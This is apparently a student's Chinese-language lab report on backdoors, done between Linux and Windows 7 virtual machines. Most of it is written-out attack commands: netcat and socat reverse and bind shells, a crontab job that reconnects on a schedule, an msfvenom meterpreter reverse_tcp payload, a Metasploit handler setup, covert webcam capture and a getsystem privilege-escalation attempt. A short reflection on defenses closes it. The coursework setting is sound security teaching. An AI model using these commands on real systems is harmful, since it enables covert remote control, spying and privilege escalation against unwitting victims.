Exp2后门原理与实践20164309路人龙套

使用ipconfig查看win7虚拟机IP地址为：192.168.236.130

进入文件夹

cdnetcat开始监听

ncat.exe-l-p4309这里的-l是监听模式，-p是选择监听的端口。

nc192.168.236.1304309-e/bin/sh

ncat.exe-ecmd.exe192.168.236.1314309

可以发现，linux端获得了win的shell

ncat.exe-l-p43092.使用crontab指令增加一条定时任务crontab-ecrontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令，并将其存放于crontab文件中，以供之后读取和执行，"-e"表示编辑

在最后添加一条定时连接win端口的指令

tcp-listen:4309exec:cmd.exe,pty,stderr这个命令可以将cmd.exe绑定到4309端口，并且将cmd.exe的stderr重定向到stdout上

我们可以看到，创建任务成功

使用Windows+l锁定主机后，再解锁，发现程序已经运行

socat-tcp:192.168.236.130:4309这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的4309端口。

在实现的时候我出现了一个问题：在tcp后多打了一个空格，卡了很久，不过好在成功了，大家引以为戒。

修改后发现已经成功获取cmdShell：

在linux端使用msfvenom工具，生成后门：

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.6.194LPORT=4309-fexe>20164309_backdoor.exe192.168.236.131其中-p使用的payload，为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反弹回连的IP，即攻击机linux的IP地址，LPORT是回连的端口，-f是生成文件的类型，>输出到哪个文件

由于一开始没有充分理解这里的ip地址的意义，我使用了被攻击win端的地址，导致在之后使用后门的时候屡屡失败。经过理解我发现这里的ip是被攻击主机需要连接的地址，即为攻击机linux端的地址。

需要在win端关闭杀软和防火墙的条件下进行

ncat.exe-lv4309>20164309_backdoor.exe其中-lv表示可以观察到连接状态

nc192.168.236.1304309<20164309_backdoor.exe发送文件在win端命令行显示传输成功

的确传输成功了

输入

msfconsole进入控制台（之后由于实验屡次失败我进入了这个界面不知道多少次。。。幸亏这里有一个小彩蛋，每次进入的界面大都和之前不一样，也算是苦中作乐了吧）

useexploit/multi/handler设置payload

setpayloadwindows/meterpreter/reverse_tcp使用生成后门程序时相同的payload

setLHOST192.168.236.131这里需要与生成后门程序的主机IP相同

setLPORT4309需要使用相同的端口

showoptions显示选项

exploit进行监听

屡次尝试，在纠正了刚刚说的那个错误后在win端运行了正确的后门

还有很多功能可以使用，我们一个一个试试吧

发现无法进行拍照，看看排除一下原因，发现：

貌似虚拟机无法调用内置摄像头

上网查查有什么解决的方法

？？？现在去买一个外置摄像头也来不及了，忍痛割爱在自己主机上试试吧。。。

按部就班地进行试验：

查得ip地址为：192.168.6.194

传输后门

在linux准备就绪后运行后门

发现可以拍照了，那多拍几张选一张看得出生理特征的（比如眼镜（？？？）），就决定是你了:hAcbeMwj,jpeg

输入getuid查看权限分组

输入getsystem进行提权

发现在提权时遇到了一些问题，无法提权

再试试win7的管理员账号

意想不到的是竟然成功了，希望大神们能帮忙解释一下原理

记得很久以前的三一五晚会曝光了一些手机APP擅自添加后门，导致巨大的财产损失的案例，那时候智能手机方兴未艾，人们的安全意识也相对薄弱，但是现在这样的事情还真实地发生在我们身边；还有一些钓鱼网站会诱导我们点击下载一些后门程序，一旦程序运行就成了人为刀俎我为鱼肉的情形了。

后门可能会伪装成正常的程序或软件，诱导用户使用，来获取你的权限。

远程拍照功能。在之前bm管理概论的课程中我阅读了《无处可藏》这本书，有一段令我印象深刻的细节是斯诺登笔记本电脑的摄像头用胶带封住了，当时我还认为杞人忧天了，但是没有想到这种技术门槛这么低。

对于我们来说最好的办法就是经常性的杀毒、及时更新系统、病毒库以查找后门。在实验中我还发现在进行远程照相的时候我摄像头旁边的呼吸灯闪了一下，如果现实生活中遇到这种情况务必要注意了